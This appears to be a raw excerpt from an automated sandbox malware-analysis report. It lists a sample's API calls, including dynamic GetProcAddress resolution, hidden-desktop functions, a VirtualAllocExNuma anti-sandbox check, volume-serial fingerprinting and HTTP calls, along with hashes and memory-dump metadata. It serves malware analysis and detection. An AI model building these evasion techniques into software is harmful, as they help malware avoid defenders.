                                    • GetProcAddress.KERNEL32(734B0000,00E5AE88), ref: 000C6C1D
                                    • GetProcAddress.KERNEL32(734B0000,00E56900), ref: 000C6C35
                                    • GetProcAddress.KERNEL32(734B0000,00E5B1A8), ref: 000C6C4E
                                    • GetProcAddress.KERNEL32(734B0000,00E6CB78), ref: 000C6C66
                                    • GetProcAddress.KERNEL32(734B0000,00E6CB18), ref: 000C6C7E
                                    • GetProcAddress.KERNEL32(734B0000,00E56A20), ref: 000C6C97
                                    • GetProcAddress.KERNEL32(734B0000,00E56940), ref: 000C6CAF
                                    • GetProcAddress.KERNEL32(734B0000,00E6CA88), ref: 000C6CC7
                                    • GetProcAddress.KERNEL32(763B0000,00E567C0), ref: 000C6CE3
                                    • GetProcAddress.KERNEL32(763B0000,00E568A0), ref: 000C6CFB
                                    • GetProcAddress.KERNEL32(763B0000,00E6CA70), ref: 000C6D14
                                    • GetProcAddress.KERNEL32(763B0000,00E6CB90), ref: 000C6D2C
                                    • GetProcAddress.KERNEL32(763B0000,00E56820), ref: 000C6D44
                                    • GetProcAddress.KERNEL32(750F0000,00E5B360), ref: 000C6D64
                                    • GetProcAddress.KERNEL32(750F0000,00E5B270), ref: 000C6D7C
                                    • GetProcAddress.KERNEL32(750F0000,00E6CAA0), ref: 000C6D95
                                    • GetProcAddress.KERNEL32(750F0000,00E56960), ref: 000C6DAD
                                    • GetProcAddress.KERNEL32(750F0000,00E567E0), ref: 000C6DC5
                                    • GetProcAddress.KERNEL32(750F0000,00E5AFC8), ref: 000C6DDE
                                    • GetProcAddress.KERNEL32(75A50000,00E6CBA8), ref: 000C6DFE
                                    • GetProcAddress.KERNEL32(75A50000,00E56800), ref: 000C6E16
                                    • GetProcAddress.KERNEL32(75A50000,00E689F0), ref: 000C6E2F
                                    • GetProcAddress.KERNEL32(75A50000,00E6CBC0), ref: 000C6E47
                                    • GetProcAddress.KERNEL32(75A50000,00E6CBF0), ref: 000C6E5F
                                    • GetProcAddress.KERNEL32(75A50000,00E56840), ref: 000C6E78
                                    • GetProcAddress.KERNEL32(75A50000,00E56880), ref: 000C6E90
                                    • GetProcAddress.KERNEL32(75A50000,00E6CBD8), ref: 000C6EA8
                                    • GetProcAddress.KERNEL32(75A50000,00E6C980), ref: 000C6EC1
                                    • GetProcAddress.KERNEL32(75A50000,CreateDesktopA), ref: 000C6ED7
                                    • GetProcAddress.KERNEL32(75A50000,OpenDesktopA), ref: 000C6EEE
                                    • GetProcAddress.KERNEL32(75A50000,CloseDesktop), ref: 000C6F05
                                    • GetProcAddress.KERNEL32(75070000,00E568C0), ref: 000C6F21
                                    • GetProcAddress.KERNEL32(75070000,00E6C9E0), ref: 000C6F39
                                    • GetProcAddress.KERNEL32(75070000,00E6CC08), ref: 000C6F52
                                    • GetProcAddress.KERNEL32(75070000,00E6C938), ref: 000C6F6A
                                    • GetProcAddress.KERNEL32(75070000,00E6C950), ref: 000C6F82
                                    • GetProcAddress.KERNEL32(74E50000,00E568E0), ref: 000C6F9E
                                    • GetProcAddress.KERNEL32(74E50000,00E56920), ref: 000C6FB6
                                    • GetProcAddress.KERNEL32(75320000,00E56980), ref: 000C6FD2
                                    • GetProcAddress.KERNEL32(75320000,00E6CE90), ref: 000C6FEA
                                    • GetProcAddress.KERNEL32(6F030000,00E56760), ref: 000C700A
                                    • GetProcAddress.KERNEL32(6F030000,00E569E0), ref: 000C7022
                                    • GetProcAddress.KERNEL32(6F030000,00E567A0), ref: 000C703B
                                    • GetProcAddress.KERNEL32(6F030000,00E6CC50), ref: 000C7053
                                    • GetProcAddress.KERNEL32(6F030000,00E569A0), ref: 000C706B
                                    • GetProcAddress.KERNEL32(6F030000,00E566A0), ref: 000C7084
                                    • GetProcAddress.KERNEL32(6F030000,00E569C0), ref: 000C709C
                                    • GetProcAddress.KERNEL32(6F030000,00E56A00), ref: 000C70B4
                                    • GetProcAddress.KERNEL32(6F030000,InternetSetOptionA), ref: 000C70CB
                                    • GetProcAddress.KERNEL32(6F030000,HttpQueryInfoA), ref: 000C70E2
                                    • GetProcAddress.KERNEL32(74E00000,00E6CED8), ref: 000C70FE
                                    • GetProcAddress.KERNEL32(74E00000,00E68B90), ref: 000C7116
                                    • GetProcAddress.KERNEL32(74E00000,00E6CE30), ref: 000C712F
                                    • GetProcAddress.KERNEL32(74E00000,00E6CEA8), ref: 000C7147
                                    • GetProcAddress.KERNEL32(74DF0000,00E56680), ref: 000C7163
                                    • GetProcAddress.KERNEL32(6CF00000,00E6CEC0), ref: 000C717F
                                    • GetProcAddress.KERNEL32(6CF00000,00E566C0), ref: 000C7197
                                    • GetProcAddress.KERNEL32(6CF00000,00E6CC38), ref: 000C71B0
                                    • GetProcAddress.KERNEL32(6CF00000,00E6CC80), ref: 000C71C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: h$ i$ j$@c$@d$@f$@h$@i$CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA$`c$`d$`f$`g$`h$`i$c$g$h$i
                                    • API String ID: 2238633743-3015402725
                                    • Opcode ID: 880409e1c1f4ddf7c71a30a1b8238bd5152f0efba67e1fffc77c408b78e220e5
                                    • Instruction ID: f350f83e21ccae0cbdb54e7161b05b1ce8945bc97ddeec7c1e5b8c31f3fc34fc
                                    • Opcode Fuzzy Hash: 880409e1c1f4ddf7c71a30a1b8238bd5152f0efba67e1fffc77c408b78e220e5
                                    • Instruction Fuzzy Hash: 5E621AB5E12200AFD754DF65FC8CA2637BAF788602354891BF956D3764EA34AC80DF60
                                    APIs
                                    • lstrlen.KERNEL32(000CCFEC), ref: 000BF1D5
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000BF1F1
                                    • lstrlen.KERNEL32(000CCFEC), ref: 000BF1FC
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000BF215
                                    • lstrlen.KERNEL32(000CCFEC), ref: 000BF220
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000BF239
                                    • lstrcpy.KERNEL32(00000000,000D4FA0), ref: 000BF25E
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000BF28C
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000BF2C0
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000BF2F0
                                    • lstrlen.KERNEL32(00E56520), ref: 000BF315
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID: e$ERROR
                                    • API String ID: 367037083-2176359330
                                    • Opcode ID: 605d44c6f9e5e96e830a15971abfc7042030810dda6d56869c9f902249992099
                                    • Instruction ID: 32ba5474bb28bc4131c90ab8bd2f787a3172dffd59d48a3cc33d510d281d8b74
                                    • Opcode Fuzzy Hash: 605d44c6f9e5e96e830a15971abfc7042030810dda6d56869c9f902249992099
                                    • Instruction Fuzzy Hash: 6EA24F70E012069FDB60DF69DD48AAABBF5AF45714F18807AE849DB362EB31DC41CB50
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000C0013
                                    • lstrlen.KERNEL32(000CCFEC), ref: 000C00BD
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000C00E1
                                    • lstrlen.KERNEL32(000CCFEC), ref: 000C00EC
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000C0110
                                    • lstrlen.KERNEL32(000CCFEC), ref: 000C011B
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000C013F
                                    • lstrlen.KERNEL32(000CCFEC), ref: 000C015A
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000C0189
                                    • lstrlen.KERNEL32(000CCFEC), ref: 000C0194
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000C01C3
                                    • lstrlen.KERNEL32(000CCFEC), ref: 000C01CE
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000C0206
                                    • lstrlen.KERNEL32(000CCFEC), ref: 000C0250
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000C0288
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000C059B
                                    • lstrlen.KERNEL32(00E565A0), ref: 000C05AB
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000C05D7
                                    • lstrcat.KERNEL32(00000000,?), ref: 000C05E3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C060E
                                    • lstrlen.KERNEL32(00E6D9A8), ref: 000C0625
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000C064C
                                    • lstrcat.KERNEL32(00000000,?), ref: 000C0658
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C0681
                                    • lstrlen.KERNEL32(00E564A0), ref: 000C0698
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000C06C9
                                    • lstrcat.KERNEL32(00000000,?), ref: 000C06D5
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C0706
                                    • lstrcpy.KERNEL32(00000000,00E68B80), ref: 000C074B
                                      • Part of subcall function 000A1530: lstrcpy.KERNEL32(00000000,?), ref: 000A1557
                                      • Part of subcall function 000A1530: lstrcpy.KERNEL32(00000000,?), ref: 000A1579
                                      • Part of subcall function 000A1530: lstrcpy.KERNEL32(00000000,?), ref: 000A159B
                                      • Part of subcall function 000A1530: lstrcpy.KERNEL32(00000000,?), ref: 000A15FF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000C077F
                                    • lstrcpy.KERNEL32(00000000,00E6DA38), ref: 000C07E7
                                    • lstrcpy.KERNEL32(00000000,00E687F0), ref: 000C0858
                                    • lstrcpy.KERNEL32(00000000,fplugins), ref: 000C08CF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000C0928
                                    • lstrcpy.KERNEL32(00000000,00E68980), ref: 000C09F8
                                      • Part of subcall function 000A24E0: lstrcpy.KERNEL32(00000000,?), ref: 000A2528
                                      • Part of subcall function 000A24E0: lstrcpy.KERNEL32(00000000,?), ref: 000A254E
                                      • Part of subcall function 000A24E0: lstrcpy.KERNEL32(00000000,?), ref: 000A2577
                                    • lstrcpy.KERNEL32(00000000,00E68800), ref: 000C0ACE
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000C0B81
                                    • lstrcpy.KERNEL32(00000000,00E68800), ref: 000C0D58
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat
                                    • String ID: fplugins
                                    • API String ID: 2500673778-38756186
                                    • Opcode ID: 11bedbd5edf190439f37e900648c90a79d332cd15363a335ba61169b2ddc4ac6
                                    • Instruction ID: 7d4a3f459399f37545a7bbefe44074baed5a21428afd1be0eb23b83b90f21a19
                                    • Opcode Fuzzy Hash: 11bedbd5edf190439f37e900648c90a79d332cd15363a335ba61169b2ddc4ac6
                                    • Instruction Fuzzy Hash: B5E23B70A05341CFD764DF69C488BAEB7E1BF89314F58856EE48D8B262DB31D846CB42
                                    APIs
                                    • lstrlen.KERNEL32(00E56520), ref: 000BF315
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BF3A3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BF3C7
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BF47B
                                    • lstrcpy.KERNEL32(00000000,00E56520), ref: 000BF4BB
                                    • lstrcpy.KERNEL32(00000000,00E68B20), ref: 000BF4EA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BF59E
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000BF61C
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BF64C
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BF69A
                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 000BF718
                                    • lstrlen.KERNEL32(00E68B10), ref: 000BF746
                                    • lstrcpy.KERNEL32(00000000,00E68B10), ref: 000BF771
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BF793
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BF7E4
                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 000BFA32
                                    • lstrlen.KERNEL32(00E68B00), ref: 000BFA60
                                    • lstrcpy.KERNEL32(00000000,00E68B00), ref: 000BFA8B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BFAAD
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BFAFE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID: e$ERROR
                                    • API String ID: 367037083-2176359330
                                    • Opcode ID: d190afee095b896517270182ca7586e60dbf5fc6885a329739068cf369c64b67
                                    • Instruction ID: c8eb854cc731e777a7f9043ac8ae29215fbba10e708a72829d62445a7e3a2adb
                                    • Opcode Fuzzy Hash: d190afee095b896517270182ca7586e60dbf5fc6885a329739068cf369c64b67
                                    • Instruction Fuzzy Hash: D8F12070A02202CFDB64DF69DD48AAAB7F5BF44714B1981BEE4099B362DB31DC42CB51

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                     Control-flow graph residue (edge list omitted); basic blocks that call APIs or subroutines:
                                     • b8ca0-b8cc4 StrCmpCA
                                     • b8cc6-b8cc7 ExitProcess
                                     • b8d06-b8d15 lstrlen
                                     • b8d17-b8d1c call a2a20
                                     • b8d1f-b8d2b call a2930
                                     • b8d30-b8d3f lstrlen
                                     • b8d41-b8d46 call a2a20
                                     • b8d49-b8d55 call a2930
                                     • b8d5a-b8d69 lstrlen
                                     • b8d6b-b8d70 call a2a20
                                     • b8d73-b8d7f call a2930
                                     • b8d84-b8d92 StrCmpCA
                                     • b8da4-b8db8 StrCmpCA
                                     • b8dbd-b8dcb StrCmpCA
                                     • b8ddd-b8deb StrCmpCA
                                     • b8dfd-b8e0b StrCmpCA
                                     • b8e1d-b8e2b StrCmpCA
                                     • b8e3d-b8e4b StrCmpCA
                                     • b8e56-b8e64 StrCmpCA
                                     • b8e6f-b8e7d StrCmpCA
                                     • b8e88-b8e9a lstrlen
                                     • b8e9c-b8ea1 call a2a20
                                     • b8ea4-b8eb0 call a2930
                                     • b8ebb-b8ebd lstrcpy
                                     • b8ee2-b8eef call a2a20
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: block
                                    • API String ID: 621844428-2199623458
                                    • Opcode ID: 7db02636117a6538c5b10a7628a5b93f63599cc75c95398b112386bc0b2d97b3
                                    • Instruction ID: 9cafa273ab76a6b5bd0fa16b5ba2b1d42c5675214fb118fc0d83b46dc381bfd2
                                    • Opcode Fuzzy Hash: 7db02636117a6538c5b10a7628a5b93f63599cc75c95398b112386bc0b2d97b3
                                    • Instruction Fuzzy Hash: EE515C70A09701EFC760AFA5EC88AAF7BF8EB54701B10882EF552D6621DB74D945CF21

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                     Control-flow graph residue (edge list omitted); basic blocks that call APIs or subroutines:
                                     • c2740-c2783 GetWindowsDirectoryA
                                     • c278c-c27ea GetVolumeInformationA
                                     • c2809-c2820 GetProcessHeap, RtlAllocateHeap
                                     • c2826-c2844 wsprintfA
                                     • c285b-c2872 call c71e0
                                    APIs
                                    • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 000C277B
                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,000B93B6,00000000,00000000,00000000,00000000), ref: 000C27AC
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000C280F
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000C2816
                                    • wsprintfA.USER32 ref: 000C283B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                                    • String ID: :\$C
                                    • API String ID: 2572753744-3309953409
                                    • Opcode ID: 31d2e598ed40c286979e84ef64f7a2ac2d77c2502d943aaeb96244052a1dfb1d
                                    • Instruction ID: 291526794eff217a9cae2dffa8d3ffcabeabc7335d2305b6c529d69976018deb
                                    • Opcode Fuzzy Hash: 31d2e598ed40c286979e84ef64f7a2ac2d77c2502d943aaeb96244052a1dfb1d
                                    • Instruction Fuzzy Hash: 383150B1D092099FCB14DFB89989AEFBFBCEF58710F10416EE505F7650E6349A408BA1

                                    Control-flow Graph (rendered graph omitted; entry block a4bc0, blocks through a4c48): calls ??2@YAPAXI@Z (3 times), lstrlen, InternetCrackUrlA and call a2a20.
                                    APIs
                                    • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 000A4BF7
                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 000A4C01
                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 000A4C0B
                                    • lstrlen.KERNEL32(?,00000000,?), ref: 000A4C1F
                                    • InternetCrackUrlA.WININET(?,00000000), ref: 000A4C27
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ??2@$CrackInternetlstrlen
                                    • String ID: <
                                    • API String ID: 1683549937-4251816714
                                    • Opcode ID: 9570d2f9cb1680c2ae8500b29a0dba9db724e1c54dc7d97617be7bd76e51c600
                                    • Instruction ID: ec430ea40eea22a08b13f18673f908fea404674a2b4bd0698bb2bf5ad67c4182
                                    • Opcode Fuzzy Hash: 9570d2f9cb1680c2ae8500b29a0dba9db724e1c54dc7d97617be7bd76e51c600
                                    • Instruction Fuzzy Hash: 07012D71D01218AFDB10DFA8EC49B9EBBB8EB59320F004126F954E7390EB7499048FD4

                                    Control-flow Graph (rendered graph omitted; entry block a1030, blocks through a10b6): calls GetCurrentProcess, VirtualAllocExNuma, ExitProcess, VirtualAlloc and VirtualFree.
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 000A1046
                                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 000A104D
                                    • ExitProcess.KERNEL32 ref: 000A1058
                                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 000A106C
                                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 000A10AB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
